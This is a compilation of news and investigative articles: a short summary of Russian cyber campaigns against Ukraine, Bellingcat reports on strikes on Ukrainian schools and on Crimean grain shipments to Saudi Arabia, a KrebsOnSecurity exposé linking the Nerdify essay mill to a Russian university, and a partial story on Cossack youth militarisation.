UNC5976 ran phishing campaigns with malicious RDP files and drone-themed decoys spoofing global defense firms.
UNC6096 used WhatsApp to deliver Windows and Android malware, including GALLGRAB.
UNC5114 spread CraxsRAT disguised as a Kropyva app update.
“Russia’s use of cyber operations in support of military objectives in the war against Ukraine and beyond is multifaceted. On a tactical level, targeting has broadened to include individuals in addition to organizations in order to support frontline operations and beyond, likely due at least in part to the reliance on public and off-the-shelf technology rather than custom products.” concludes the report. “Russian threat actors have targeted secure messagingapplications used by the Ukrainian military to communicate and orchestrate military operations, including via attempts to exfiltrate locally stored databases of these apps, such as from mobile devices captured during Russia’s ongoing invasion of Ukraine. “
Russian state has tolerated parallel probiv market for its convenience but now Ukrainian spies are exploiting it
Russia is scrambling to rein in the country’s sprawling illicit market for leaked personal data, a shadowy ecosystem long exploited by investigative journalists, police and criminal groups.
For more than a decade, Russia’s so-called probiv market – a term derived from the verb “to pierce” or “to punch into a search bar” – has operated as a parallel information economy built on a network of corrupt officials, traffic police, bank employees and low-level security staff willing to sell access to restricted government or corporate databases.
Last month, in the dead of a cold Autumn night, residents in the Ukrainian town of Balakliia were woken by the sound of two massive explosions.
Social media footage showed apartments ablaze, balconies obliterated and a deep crater smouldering in a parking lot.
Three people were killed and 13 injured in the November 17 attack, Ukraine’s State Emergency Services (SES) said. Four of those injured were children, the SES added. A kindergarten, situated just over a hundred metres from one of the impact sites, was also reported to have suffered damage.
Since the beginning of the full-scale invasion of Ukraine, schools, educational facilities and spaces used by children have repeatedly been damaged in strikes or closed because of them.
According to the United Nation’s agency for children, UNICEF, many schools remain closed or continue to be disrupted by air raid alarms. Almost one million children have also been forced to study online, UNICEF states.
Balakliia lies in Kharkiv Oblast in the north east of Ukraine. Another Russian strike carried out there earlier in November caused damage near the town’s main square. Located just over 100 metres away was a high school and not far from that a local theatre school. While neither of those facilities appeared to be directly damaged, many other educational institutions have not been so lucky.
Educational Facilities in the Firing Line
A Ukrainian government website (saveschools.in.ua) has been tracking the number of kindergartens, high schools, colleges and universities that have been damaged and destroyed across the country.
At time of publication 3,676 educational facilities have been damaged nationwide and 394 destroyed, according to saveschools.in.ua.
These trends are reflected in social media data collected by Bellingcat.
Since the start of Russia’s full-scale invasion, Bellingcat has been gathering and verifying social media footage showing incidents of civilian harm.
More than 2,500 incidents have been identified during this period, including attacks on hospitals, power stations, residential buildings and cultural sites. The full dataset is public and can be found here. But this is likely just a fraction of the damage caused across Ukraine as the data only captures incidents recorded and published on social media channels that have been verified.
Amongst this dataset are more than 200 cases of educational facilities that have been damaged or destroyed.
In September this year, for example, social media footage captured the moment a Russian drone hit an administrative building at Kharkiv’s National University of Pharmacy.
As far back as July 2022, a school for the visually impaired in eastern Kharkiv was hit by Russian rockets, leaving windows smashed and classrooms burned out.
Just a few months before that, footage posted online appeared to show the remains of a missile that hit a school in the town of Merefa, situated around 30 kilometres to the southeast of Kharkiv.
Kharkiv’s Youth Bears Burden
More educational facilities have been damaged or destroyed in Kharkiv Oblast than in any other territory currently held by Ukraine, according to Bellingcat’s dataset and saveschools.in.ua statistics.
In Kharkiv city and its surrounding areas, Bellingcat found and archived footage of at least 26 schools, kindergartens, colleges or universities that have been damaged and destroyed since Russia’s full-scale invasion. A further 36 strikes that impacted areas around educational facilities in Kharkiv but did not directly hit them were also verified and archived by Bellingcat.
Bohdan Levchykov, a 15-year-old teenager, walks by a damaged habitation building in Balakliia, on October 13, 2025. OLEKSII FILIPPOV / AFP
Sustained attacks on educational facilities as well as widespread disruption to studies caused by the war are having a lasting impact on Ukraine’s young people, children’s rights groups say.
A report from Save the Children earlier this year detailed how attacks on educational facilities had doubled in Ukraine over the course of 2024. The same report found that parents were scared to send their children to school and that many children were being forced to resort to online learning at home.
A 2024 report from UNICEF has found Ukrainian children are falling behind children in other countries across all/multiple subjects including reading, maths and science.
In Balakliia, journalists from Agence France-Presse (AFP) bureaus in Paris and Kharkiv spoke to teenage student Bohdan Levchykov who said he studies at home and seldom leaves the house. Levchykov also spoke about the impact of losing his father in the early months of the war.
About an hour’s drive to the northwest, in the town of Khorocheve, a psychologist with the non-profit Voices of Children , Maryna Dudbyk, told AFP that the ongoing war means that everyone is living under stress.
“This has a huge impact on children’s emotional state,” she said.
“We diagnose a lot of fear and anxiety among children. Adolescents suffer from self-harm, suicidal thoughts, and the loss of loved ones.”
Beyond Schools
Other facilities, beyond schools, regularly enjoyed by children have also been impacted by the war, compounding the challenges young people face.
Bellingcat’s dataset found 28 incidents where swimming pools, parks, football pitches, bowling alleys or museums had been impacted in and around Kharkiv. A further 16 incidents were recorded in areas surrounding such facilities. The below interactive shows (in red) incidents where educational or recreational facilities used by young people have been impacted by Russian strikes in and around Kharkiv. The other markers in the map (in purple) detail additional civilian harm incidents Bellingcat has been able to verify. A wider dataset of showing incidents that have impacted areas surrounding educational and recreational facilities can be found here.
Incidents of civilian harm directly affecting schools and childrens’ leisure facilities are highlighted in red.
One video from March this year showed young men playing football scrambling for cover as a drone can be heard overhead before an explosion can be seen.
Although Ukraine’s policymakers are facing many challenges as Russia’s invasion of Ukraine approaches its fifth year, the mental health of the country’s youth is on their minds.
Oksana Zbitnieva, head of the Interministerial Coordination Center for Mental Health told AFP that “130,000 frontline health professionals—nurses, pediatricians, family doctors—have received certified training as part of a WHO mental health program.”
Meanwhile, more than 300 “resilience centres” welcome children and parents across the country, with three hundred more expected to be built next year, according to Ukrainian Social Affairs Minister Denys Uliutine.
New concepts are also being tested and tried.
Children leave an underground school in Kharkiv, on October 16, 2025. OLEKSII FILIPPOV / AFP
In Kharkiv, underground schools – located beneath the streets of the city – are being set up to help bring children back into the classroom.
City authorities told AFP there would be 10 underground schools operational by the end of 2025.
At a school visited by AFP, a rotating system allows it to continue offering children in-person education, even if only for a limited time, each week. The school enables every child to attend half a day of their class in-person each week. When the child returns home they continue their education via remote classes, while another student comes into school for their half day spot. This allows the school to accommodate 1,400 children, including on weekends.
Yet recent events in Kharkiv highlight that normal life is far from returning, despite recent peace efforts.
At the end of October, a kindergarten in the west of the city was struck by a Russian drone.
Footage from the scene showed panicked parents and disoriented children being carried from away by emergency workers as smoke billowed from the kindergarten.
Despite the scale of the destruction visible in social media footage, only one person (an adult male) was reported to have died during this strike.
For many youngsters in Ukraine, there may be no reclaiming the childhood that war has taken from them.
But Bohdan Levchykov in Balakliia believes there are still things to look forward to.
He told AFP about the friends he had made online – including one named Lana who lives more than 400km away in the city of Dnipro- and his hopes of meeting them in real life one day.
“I’ve talked about it with my mother,” he told AFP.
“Maybe our parents can arrange something for us to meet,” he said hopefully.
Eoghan Macguire, Youri van der Weide and Logan Williams contributed to this report for Bellingcat as did Stéphanie Ladel and Olivia Gresham from Bellingcat’s Volunteer Community.
Boris Bachorz reported and conducted interviews for AFP with the help of Natalia Yermak.
A version of this story can be found on the website of the Central European Digital Media Observatory (CEDMO) website.
Bellingcat is a non-profit and the ability to carry out our work is dependent on the kind support of individual donors. If you would like to support our work, you can do so here. You can also subscribe to our Patreon channel here. Subscribe to our Newsletter and follow us on Twitter here and Mastodon here.
A joint investigation by Bellingcat and Lloyd’s List has identified Saudi Arabia as the newest country to import grain directly from a Western-sanctioned port in occupied Crimea, as Russia attempts to secure recognition of the Ukrainian territory via a US-led peace plan.
Satellite imagery and Automated Identification System (AIS) data from Lloyd’s List Intelligence shows the bulk carrier Krasnodar (IMO: 9296781) sailed from Avlita Grain Terminal in Sevastopol to Saudi Arabia on two occasions between September and November 2025. Bellingcat confirmed Krasnodar’s journeys ended at Saudi Arabia’s King Abdullah Port in September and the Port of Jazan in November.
These journeys show that Saudi Arabia has joined buyers in Iran, Syria, Egypt, Turkey, Venezuela and Houthi-controlled territories in Yemen who are willing to accept what the Ukrainian government describes as “stolen” grain.
Krasnodar turns its AIS back on in the Black Sea, as required to transit the Bosphorus on September 6.
Bosphorus Strait
Krasnodar transits the Bosphorus. Judging by the draft, with no visible red paint on its hull, the ship appears to be fully laden.
Credit: Yörük Işık
Saudi Arabia: King Abdullah Port
Imagery (as well as AIS data) shows Krasnodar docked at the King Abdullah Port. A pile of what appears to be grain is visible to the right of the image on September 18.
Returning via the Suez Canal, Krasnodar transits through the Bosphorus on September 28 with its red paint fully visible, indicating it is not heavily laden.
Credit: Yörük Işık
Black Sea
Krasnodar goes dark – an AIS gap lasting more than one week begins on October 6.
Occupied Crimea: Port of Sevastopol
Satellite imagery shows Krasnodar docked, with its hatches open, at Berth 21 of the Avlita grain terminal on October 8.
After leaving Jazan, Krasnodar returned to the Black Sea via the Bosphorus on November 23.
It stopped transmitting AIS for a third time on November 24 for nine days and has been intermittently transmitting data since.
Krasnodar was again captured in satellite imagery docked at the Avlita terminal in Sevastopol on November 26.
Krasnodar captured in satellite imagery docked at the Avlita terminal in Sevastopol on November 26. Credit: Planet Labs PBC
Petrokhleb-Kuban Denies Visiting Avlita Terminal
Documents accessed on Russia’s federal registry indicate the vessel is leased by Russian firm Petrokhleb-Kuban, a major player in Russian and international grain markets.
Petrokhleb Kuban told Bellingcat it “categorically denies any allegations of involvement in the theft of grain from Ukrainian regions”.
It added that Petrokhleb-Kuban does not export grain from the Avlita terminal to any country.
“Petrokhleb-Kuban does not operate at the port of Avlita and does not ship grain from there. All grain shipped by Petrokhleb-Kuban is produced by Russian farmers,” a spokesperson said.
“The vessel Krasnodar follows all widely accepted safety protocols and does not disable its AIS while on passage. The AIS signal in the Black Sea is being jammed by the military due to the ongoing conflict between Russia and Ukraine.”
The spokesperson also said the vessel Krasnodar was loading barley at the port of Kavkaz, “as confirmed by bills of lading and port clearance.”
AIS interference is rampant in the Black Sea, however, instances of jamming typically do not last more than a couple of days. Further, third-party disruptions impact all vessels in one area indiscriminately.
Bellingcat reviewed the AIS traces of vessels sailing near Krasnodar. In both voyages, Krasnodar was the only vessel in that area that stopped transmitting AIS data for that period of time.
Bellingcat also checked available Planet Labs PBC and Sentinel-2 satellite imagery covering the grain terminal in Port Kavkaz during the two periods of August and October where Krasnodar has absent or unreliable AIS coverage and found no vessels matching the length of the Krasnodar.
Bellingcat identified Krasnodar in Avlita terminal on three occasions, by cross referencing satellite images of Krasnodar and recent images and video of the ship. Krasnodar was last detected at Avlita terminal in satellite imagery on November 26, again with its AIS switched off. Krasnodar’s chimney is navy blue in colour, except for a white band on the left, right, and front side of the chimney. The ship’s other features – five grey hatches, four grey cranes, a red deck, a green floor on the bridge, all visually match known images of the ship.
Finally, the ship’s measurements (a total length of 183 metre according to Russia’s shipping registry) matches what we see in satellite images.
Visual Comparison: Images of Krasnodar at Avlita Terminal and other recent images of Krasnodar
The Krasnodar has a dark blue (midnight navy blue) chimney with a white band that runs around the sides and the front of the chimney, leaving the back completely blue.
A close up of the Krasnodar photographed in the Bosphorus on October 26, 2025. Credit: Yörük Işık.
The life boats are immediately to the left and right of the bridge. The boats can also be seen in satellite imagery from Saudi Arabia. The image below shows Krasnodar in Jazan.
Krasnodar seen in Satellite Image at the Port of Jazan, Saudi Arabia on November 6, 2025. Credit: Planet Labs PBC.
Satellite imagery also clearly shows the colour of deck (dull red), the floor colour of the bridge (green), the colour of the hatches and the cranes (grey). All of that, as well as the chimney (navy blue with white) can be matched with satellite imagery from Sevastopol that show Krasnodar docked at the Avlita grain terminal.
Left: Krasnodar seen in Satellite Image at the Port of Jazan, Saudi Arabia on November 6, 2025. Right: Krasnodar seen in Satellite Image docked at Avlita grain terminal in the Port of Sevastopol on October 8, 2025. Credits: Planet Labs PBC and 2025 Vantor.
Five grey hatches and a red deck. The image on the left is from Jazan (November 6). The image on the right is from Sevastopol (October 8).
A close up of the above images. Credits: Planet Labs PBC and 2025 Vantor.
If we zoom in on the bridge, we can also see that the shape and the colour (grey) of the top of the bridge are also a visual match.
The chimney is not very clearly visible in the image from Jazan but it is clear that the chimney is dark in colour. The image from Sevastopol shows a dark blue chimney with a white band, which was also visible in images and video of Krasnodar.
Left: Krasnodar seen in Satellite Image docked at Avlita grain terminal in the Port of Sevastopol on October 8, 2025. Right:A close up of the Krasnodar taken in the Bosphorus on October 26, 2025.Credits: 2025 Vantor and Yörük Işık. Annotations by Bellingcat.
We see red on the hull, below the water line, in the Sevastopol satellite image. You can also see it in the image from when the ship transited the Bosphorus. The rest of the hull is dark.
Left: Krasnodar seen in Satellite Image docked at Avlita grain terminal in the Port of Sevastopol on October 8, 2025.Right:Krasnodar photographed in the Bosphorus on October 26, 2025.Credits: 2025 Vantor and Yörük Işık.
There are no live or historic sanctions on Krasnodar, according to Lloyd’s List Intelligence data.
Saudi Arabia Joins List of Importers of Russia’s Smuggled Grain
Krasnodar’s voyages from Sevastopol to Saudi Arabia demonstrate that Russia is continuing to expand its grain exports from occupied Crimea to new markets as it negotiates to end the war in Ukraine.
Crimea’s occupied ports have become important assets for Moscow, having evolved into key logistics hubs for dark grain exports over the course of the war.
Prior to the full-scale invasion of Ukraine in 2022, the ports in occupied Crimea were used for the small-scale export of grain and scrap metal, mostly to Syria and Turkey.
The occupation of additional territory in Donetsk and Zaporizhia enabled Russia to establish a new supply route, resulting in more grain being shipped south to Crimea for export to international markets.
The Port of Sevastopol and the Avlita grain terminal remain under European,UK and US sanctions. While no UN sanctions specifically target the port, a majority of UN member states have passed resolutions condemning Russia’s invasion of Ukraine and its occupation of Crimea since 2024.
Ukraine has repeatedly tried to dissuade countries from purchasing shipments loaded with what it describes as “stolen” grain from occupied regions.
In 2023, Iran received its first grain shipments from Sevastopol. In 2024, it was joined by Venezuela, Libya, Egypt and the Houthis, which control territory in Yemen. Last month, Bellingcat revealed that the bulk carrier Irtysh (IMO: 9664976) delivered grain from the Crimean port of Sevastopol to the Houthi-controlled port of Saleef in Yemen despite Western Sanctions.
Bellingcat and other news outlets have identified a total of eight countries that have imported grain directly from occupied Crimea.
While Saudi Arabia is the latest direct importer from Sevastopol, it is unclear if authorities are aware of the origin of the cargo.
The grain shipments follow a similar pattern to Russia’s shadow fleet, which moves sanctioned oil barrels. In both cases steps are taken to disguise the origin of the cargo and port of loading.
Most ships calling to Crimea disable their AIS transponders, which is considered a deceptive shipping practice, and fraudulent documents are issued.
Alona Shkrum, First Deputy Minister for Development of Communities and Territories of Ukraine, told Bellingcat that Ukraine was closely monitoring Russian exports from occupied territories. She said Ukraine had discussed the issue with Saudi Arabia on the sidelines of recent talks at the International Maritime Organisation Assembly.
She told Bellingcat that Ukraine had “received assurances that Saudi authorities are actively counteracting the risks posed by shadow fleet operations and other violations of international maritime law.”
She added that Ukraine would continue to work with partners to identify and sanction vessels involved in the illegal export of grain from occupied territories.
Bellingcat contacted both the Saudi Arabian Ministry of Foreign Affairs and the Russian Ministry of Foreign Affairs; neither responded to requests for comment.
US-Russia Peace Plan and Ownership of Ukraine’s Ports
The US-Russia 28-point peace proposal includes the recognition of Crimea, Luhansk and Donetsk as “de facto” Russian. Ownership of Crimea and the occupied territories bordering the Sea of Azov is critical for securing shipping routes to and from Russia, and these ports play a vital role in supporting economic growth in the region.
However, the impact of ceding control of this region and the port of Sevastopol to Russia is not mentioned in either the original US draft plan or subsequent amended versions.
Ian Ralby, chief executive of the maritime and resource security consultancy I.R. Consilium said while it was a high priority for Ukraine to ensure access to the grain market through the Black Sea is preserved, Russia is continuing to try to expand its global access to ports.
“We see that there is a resurgence in Russia’s efforts on port access.”
“As the prospect of potential peace begins to loom, even though it seems to be much farther off than many would want, there is likely to be a renewed focus on the key strategic assets that matter for the future, and the ports have to be foremost among them.”
Bridget Diakun, Yörük Işık, Youri van der Weide, Peter Barth and Galen Reichcontributed to this report.
Cover image: Planet Lab image shows Krasnodar docked at Jazan City, Saudi Arabia on November 6. Credit: Planet Labs PBC.
Bellingcat is a non-profit and the ability to carry out our work is dependent on the kind support of individual donors. If you would like to support our work, you can do so here. You can also subscribe to our Patreon channel here. Subscribe to our Newsletter and follow us on Twitter here and Mastodon here.
A sprawling academic cheating network turbocharged by Google Ads that has generated nearly $25 million in revenue has curious ties to a Kremlin-connected oligarch whose Russian university builds drones for Russia’s war against Ukraine.
The Nerdify homepage.
The link between essay mills and Russian attack drones might seem improbable, but understanding it begins with a simple question: How does a human-intensive academic cheating service stay relevant in an era when students can simply ask AI to write their term papers? The answer – recasting the business as an AI company – is just the latest chapter in a story of many rebrands that link the operation to Russia’s largest private university.
Search in Google for any terms related to academic cheating services — e.g., “help with exam online” or “term paper online” — and you’re likely to encounter websites with the words “nerd” or “geek” in them, such as thenerdify[.]com and geekly-hub[.]com. With a simple request sent via text message, you can hire their tutors to help with any assignment.
These nerdy and geeky-branded websites frequently cite their “honor code,” which emphasizes they do not condone academic cheating, will not write your term papers for you, and will only offer support and advice for customers. But according to This Isn’t Fine, a Substack blog about contract cheating and essay mills, the Nerdify brand of websites will happily ignore that mantra.
“We tested the quick SMS for a price quote,” wrote This Isn’t Fine author Joseph Thibault. “The honor code references and platitudes apparently stop at the website. Within three minutes, we confirmed that a full three-page, plagiarism- and AI-free MLA formatted Argumentative essay could be ours for the low price of $141.”
A screenshot from Joseph Thibault’s Substack post shows him purchasing a 3-page paper with the Nerdify service.
Google prohibits ads that “enable dishonest behavior.” Yet, a sprawling global essay and homework cheating network run under the Nerdy brands has quietly bought its way to the top of Google searches – booking revenues of almost $25 million through a maze of companies in Cyprus, Malta and Hong Kong, while pitching “tutoring” that delivers finished work that students can turn in.
When one Nerdy-related Google Ads account got shut down, the group behind the company would form a new entity with a front-person (typically a young Ukrainian woman), start a new ads account along with a new website and domain name (usually with “nerdy” in the brand), and resume running Google ads for the same set of keywords.
UK companies belonging to the group that have been shut down by Google Ads since Jan 2025 include:
Currently active Google Ads accounts for the Nerdify brands include:
-OK Marketing LTD (advertising geekly-hub[.]net), formed in the name of Olha Karpenko, a young Ukrainian woman;
–Two Sigma Solutions LTD (advertising litero[.]ai), formed in the name of Olekszij (Alexey) Pokatilo.
Google’s Ads Transparency page for current Nerdify advertiser OK Marketing LTD.
Mr. Pokatilo has been in the essay-writing business since at least 2009, operating a paper-mill enterprise called Livingston Research alongside Alexander Korsukov, who is listed as an owner. According to a lengthy account from a former employee, Livingston Research mainly farmed its writing tasks out to low-cost workers from Kenya, Philippines, Pakistan, Russia and Ukraine.
Pokatilo moved from Ukraine to the United Kingdom in Sept. 2015 and co-founded a company called Awesome Technologies, which pitched itself as a way for people to outsource tasks by sending a text message to the service’s assistants.
The other co-founder of Awesome Technologies is 36-year-old Filip Perkon, a Swedish man living in London who touts himself as a serial entrepreneur and investor. Years before starting Awesome together, Perkon and Pokatilo co-founded a student group called Russian Business Week while the two were classmates at the London School of Economics. According to the Bulgarian investigative journalist Christo Grozev, Perkon’s birth certificate was issued by the Soviet Embassy in Sweden.
Alexey Pokatilo (left) and Filip Perkon at a Facebook event for startups in San Francisco in mid-2015.
Around the time Perkon and Pokatilo launched Awesome Technologies, Perkon was building a social media propaganda tool called the Russian Diplomatic Online Club, which Perkon said would “turbo-charge” Russian messaging online. The club’s newsletter urged subscribers to install in their Twitter accounts a third-party app called Tweetsquad that would retweet Kremlin messaging on the social media platform.
Perkon was praised by the Russian Embassy in London for his efforts: During the contentious Brexit vote that ultimately led to the United Kingdom leaving the European Union, the Russian embassy in London used this spam tweeting tool to auto-retweet the Russian ambassador’s posts from supporters’ accounts.
Neither Mr. Perkon nor Mr. Pokatilo replied to requests for comment.
A review of corporations tied to Mr. Perkon as indexed by the business research service North Data finds he holds or held director positions in several U.K. subsidiaries of Synergy University, Russia’s largest private education provider. Synergy has more than 35,000 students, and sells T-shirts with patriotic slogans such as “Crimea is Ours,” and “The Russian Empire — Reloaded.”
The president of Synergy University is Vadim Lobov, a Kremlin insider whose headquarters on the outskirts of Moscow reportedly features a wall-sized portrait of Russian President Vladimir Putin in the pop-art style of Andy Warhol. For a number of years, Lobov and Perkon co-produced a cross-cultural event in the U.K. called Russian Film Week.
Synergy President Vadim Lobov and Filip Perkon, speaking at a press conference for Russian Film Week, a cross-cultural event in the U.K. co-produced by both men.
Mr. Lobov was one of 11 individuals reportedly hand-picked by the convicted Russian spy Marina Butina to attend the 2017 National Prayer Breakfast held in Washington D.C. just two weeks after President Trump’s first inauguration.
While Synergy University promotes itself as Russia’s largest private educational institution, hundreds of international students tell a different story. Online reviews from students paint a picture of unkept promises: Prospective students from Nigeria, Kenya, Ghana, and other nations paying thousands in advance fees for promised study visas to Russia, only to have their applications denied with no refunds offered.
“My experience with Synergy University has been nothing short of heartbreaking,” reads one such account. “When I first discovered the school, their representative was extremely responsive and eager to assist. He communicated frequently and made me believe I was in safe hands. However, after paying my hard-earned tuition fees, my visa was denied. It’s been over 9 months since that denial, and despite their promises, I have received no refund whatsoever. My messages are now ignored, and the same representative who once replied instantly no longer responds at all. Synergy University, how can an institution in Europe feel comfortable exploiting the hopes of Africans who trust you with their life savings? This is not just unethical — it’s predatory.”
This pattern repeats across reviews by multilingual students from Pakistan, Nepal, India, and various African nations — all describing the same scheme: Attractive online marketing, promises of easy visa approval, upfront payment requirements, and then silence after visa denials.
Reddit discussions in r/Moscow and r/AskARussian are filled with warnings. “It’s a scam, a diploma mill,” writes one user. “They literally sell exams. There was an investigation on Rossiya-1 television showing students paying to pass tests.”
The Nerdify website’s “About Us” page says the company was co-founded by Pokatilo and an American named Brian Mellor. The latter identity seems to have been fabricated, or at least there is no evidence that a person with this name ever worked at Nerdify.
Rather, it appears that the SMS assistance company co-founded by Messrs. Pokatilo and Perkon (Awesome Technologies) fizzled out shortly after its creation, and that Nerdify soon adopted the process of accepting assignment requests via text message and routing them to freelance writers.
A closer look at an early “About Us” page for Nerdify in The Wayback Machine suggests that Mr. Perkon was the real co-founder of the company: The photo at the top of the page shows four people wearing Nerdify T-shirts seated around a table on a rooftop deck in San Francisco, and the man facing the camera is Perkon.
Filip Perkon, top right, is pictured wearing a Nerdify T-shirt in an archived copy of the company’s About Us page. Image: archive.org.
Where are they now? Pokatilo is currently running a startup called Litero.Ai, which appears to be an AI-based essay writing service. In July 2025, Mr. Pokatilo received pre-seed funding of $800,000 for Litero from an investment program backed by the venture capital firms AltaIR Capital, Yellow Rocks, Smart Partnership Capital, and I2BF Global Ventures.
This past week, Mr. Lobov was in India with Putin’s entourage on a charm tour with India’s Prime Minister Narendra Modi. Although Synergy is billed as an educational institution, a review of the company’s sprawling corporate footprint (via DNS) shows it also is assisting the Russian government in its war against Ukraine.
Synergy University President Vadim Lobov (right) pictured this week in India next to Natalia Popova, a Russian TV presenter known for her close ties to Putin’s family, particularly Putin’s daughter, who works with Popova at the education and culture-focused Innopraktika Foundation.
The website bpla.synergy[.]bot, for instance, says the company is involved in developing combat drones to aid Russian forces and to evade international sanctions on the supply and re-export of high-tech products.
A screenshot from the website of synergy,bot shows the company is actively engaged in building armed drones for the war in Ukraine.
KrebsOnSecurity would like to thank the anonymous researcher NatInfoSec for their assistance in this investigation.
Update, Dec. 8, 10:06 a.m. ET: Mr. Pokatilo responded to requests for comment after the publication of this story. Pokatilo said he has no relation to Synergy nor to Mr. Lobov, and that his work with Mr. Perkon ended with the dissolution of Awesome Technologies.
“I have had no involvement in any of his projects and business activities mentioned in the article and he has no involvement in Litero.ai,” Pokatilo said of Perkon.
Mr. Pokatilo said his new company Litero “does not provide contract cheating services and is built specifically to improve transparency and academic integrity in the age of universal use of AI by students.”
“I am Ukrainian,” he said in an email. “My close friends, colleagues, and some family members continue to live in Ukraine under the ongoing invasion. Any suggestion that I or my company may be connected in any way to Russia’s war efforts is deeply offensive on a personal level and harmful to the reputation of Litero.ai, a company where many team members are Ukrainian.”
Update, Dec. 11, 12:07 p.m. ET: Mr. Perkon responded to requests for comment after the publication of this story. Perkon said the photo of him in a Nerdify T-shirt (see screenshot above) was taken after a startup event in San Francisco, where he volunteered to act as a photo model to help friends with their project.
“I have no business or other relations to Nerdify or any other ventures in that space,” Mr. Perkon said in an email response. “As for Vadim Lobov, I worked for Venture Capital arm at Synergy until 2013 as well as his business school project in the UK, that didn’t get off the ground, so the company related to this was made dormant. Then Synergy kindly provided sponsorship for my Russian Film Week event that I created and ran until 2022 in the U.K., an event that became the biggest independent Russian film festival outside of Russia. Since the start of the Ukraine war in 2022 I closed the festival down.”
“I have had no business with Vadim Lobov since 2021 (the last film festival) and I don’t keep track of his endeavours,” Perkon continued. “As for Alexey Pokatilo, we are university friends. Our business relationship has ended after the concierge service Awesome Technologies didn’t work out, many years ago.”
This is
Олег Монин
who took Berkut’s oath
four months earlier. Through this veiled Cossack
Youth Organisation, he trained in combat tactics with returned fighters and transitioned from
pretend to real weapons.
Within a year, Oleg abandoned his studies and enlisted in
БАРС-15,
a Cossack Volunteer Battalion fighting in Ukraine.
By Feb. 10, 2025 Oleg was dead. He died aged 19, less than four months after deployment in Ukraine.
Cossack societies, organisations, and even military units provide an identity that is indigenous to
Russia, Visiting Assistant Professor at Miami University, Dr Marcello Fantoni told Bellingcat.
This
identity is “rooted in ‘traditional’ values, martial prowess, military readiness, orthodox
religiosity and a culture not influenced by the ‘corrupting’ West,” Fantoni added via email. This is
why “education is central to the overall enterprise”.
Oleg’s story demonstrates how the Cossacks drive young people from a school club to a war zone and
enable a state-sponsored alternative mobilisation force.
WHO ARE THE RUSSIAN COSSACKS?
The Cossacks played an important role in the formation of the Russian Empire. They lived in
communities called hosts on the edges of the empire. They operate under
a military hierarchy ruled by a chief,
the Ataman. Due to their loyalty to the Tsar, the Cossacks were repressed by the
Bolsheviks after 1917.
Credit: Journal “Chronicle of War”, 1915; Nicholas II among officers
When the Soviet Union collapsed in 1991, the Cossacks’ descendants
called for a “rebirth”.
In 2005, a bill submitted by President Vladimir Putin allowed registered Cossack organisations members
to serve in military units and police forces.
Credit: tamvesti.ru
New hosts were created in traditionally non-Cossack lands with a
variety of institutions
to direct them. In 2018, the government
united them in the “All-Russian Cossack
Society”. Putin tries to marginalise the traditional Cossack groups, analyst Paul Goble told
Bellingcat while the ones “he has created for his own purposes” play a “major role in military and
patriotic education”.
Credit: Kremlin
Only 8 of Russia’s 83 recognized
Federal Subjects do not
have a registered Cossack Host.
In 2018, the Black Sea Cossack Host of Crimea
entered
the register.
The peninsula has been under Russian occupation since 2014. The Cossack legacy is also vitally important to Ukrainian
identity.
There are new
hosts in the occupied Ukrainian territories of Kherson, Zaporizhzhia, Donetsk, and
Luhansk.
Russian Cossack organisations have been “very active within the occupied Ukrainian regions,” Dr
Fantoni told Bellingcat. They “recruit local residents and then deploy them for cultural and
military purposes,” allowing Russia “to contest and even co-opt a central tenet of Ukrainian
national identity – Cossackdom,” he said.
The national “All-Russian Cossack Society” VSKO was
created
in 2018,
and in 2019, the
State
Duma
gave Russian President Vladimir Putin exclusive authority to appoint its national Ataman.
At the top of the VSKO is Ataman Vitaly
Kuznetsov, a Cossack General.
Kuznetsov was
appointed
in November 2023, succeeding the first-ever national Ataman – Nikolai Doluda, then 70 years old
and a
sanctioned individual.
Kuznetsov has also become a leading Cossack interacting with the Russian state.
Including with Dmitry Mironov,
assistant to President Putin and Chair of the Council for Cossack Affairs.
As well as Leonid Pasechnik, head of the Luhansk People’s Republic. Kuznetsov
thanked
Pasechnik in June for helping create three Cossack Cadet Corps in the occupied region.
According to Kuznetsov, the VSKO
priorities are “development of military Cossack societies in all directions: education, culture,
history, and most importantly, youth. Everything through youth.”
EVERYTHING THROUGH YOUTH
Cossack education can be divided into primary, secondary, and tertiary levels, all with the goal
of
promoting a unified system.
There are Cossack schools and regular schools with a Cossack affiliation.
Data from 2022
claim there were just under 2000 such institutions with around 210,000 students, but
recent claims point to over 300,000
students.
Oleg’s story demonstrates how young people outside formal Cossack education can still get pulled
in. It also shows that the Cossacks are but one of several interlaced strategies for
“military-patriotic” education.
Oleg grew up in Saratov.
Credit: Image of youth practicing putting on a gas mask, posted on VKontakte by Lyceum N.3.
He studied in Lyceum N.3, a state-funded educational institution in Saratov. Often, the school
promotes events like the national
Zarnitsa
competition. It includes activities like “putting on gas masks” or “sniper games” for third
graders.
The school’s
military club “Fakel”
acts as an intermediary for these events and other nationwide military education initiatives
such as the 24-hour-long
Avangard training for tenth graders.
In 2024,
Natalia
Saprykina,
the director of Lyceum N.3, was
awarded
a Letter of Gratitude for her “contribution to the patriotic education of the younger
generation” by
a Deputy of the
Regional
Duma.
Oleg graduated from high school in 2023
at the age of 17.
In the same year he enrolled in InPIT, a
higher education
institution of the Saratov State Technical University.
By November Oleg had turned 18 and was
wearing
military fatigues and practising survival skills alongside other candidates of a
“military-patriotic” student association named Berkut, at another local university, the
Saratov State Law Academy (SSLA).
Though Berkut is not explicitly a Cossack organisation, we established several
connections between the head of Berkut, Alexander Andreevich, and Cossack organisations. As
we’ll see, Andreevich was present at multiple military style training camps that Oleg took
part in.
Neither Berkut’s VKontakte nor Telegram channel descriptions mention the Cossacks.
The association’s official objectives are “forming a positive image of military service” and
“popularisation of service in the Russian army and law enforcement agencies”. It is headed by
Alexander Andreevich.
However, some of Berkut’s
videos
include the banner of a
Молодёжная казачья
организация.
A Telegram
post
by Andrey Fetisov, the Saratov District Ataman, refers to Berkut as a “Cossack Youth Movement”.
Even though Berkut (left) shares a name and eagle iconography with a notorious
Ukrainian special police
force (right), part of which defected to Russia during the occupation of Crimea in 2014,
Bellingcat found no link between the two organisations.
FROM WAR GAMES TO REAL WEAPONS
By December 2023, nearing the end of the first semester, Oleg and the other candidates
took the Berkut oath,
making them official members. Oath-taking ceremonies are
“invented
traditions”
among Cossack forces.
Atop the dais stand senior members of Berkut, including the head of the organisation – Alexander
Andreevich.
Andreevich is an active Cossack who has been working under the guidance of District Ataman
Andrey Fetisov since at least April 2023.
More recently, in January 2025, they were both delivering a
lesson
to Cossack children for Yunarmiya,
exemplifying the overlapping network of youth militarisation initiatives.
In August 2024, Andreevich attended the
iVolga
Cossack Youth Festival, where he met
Kuznetsov.
The only two people featured speaking in an
official video.
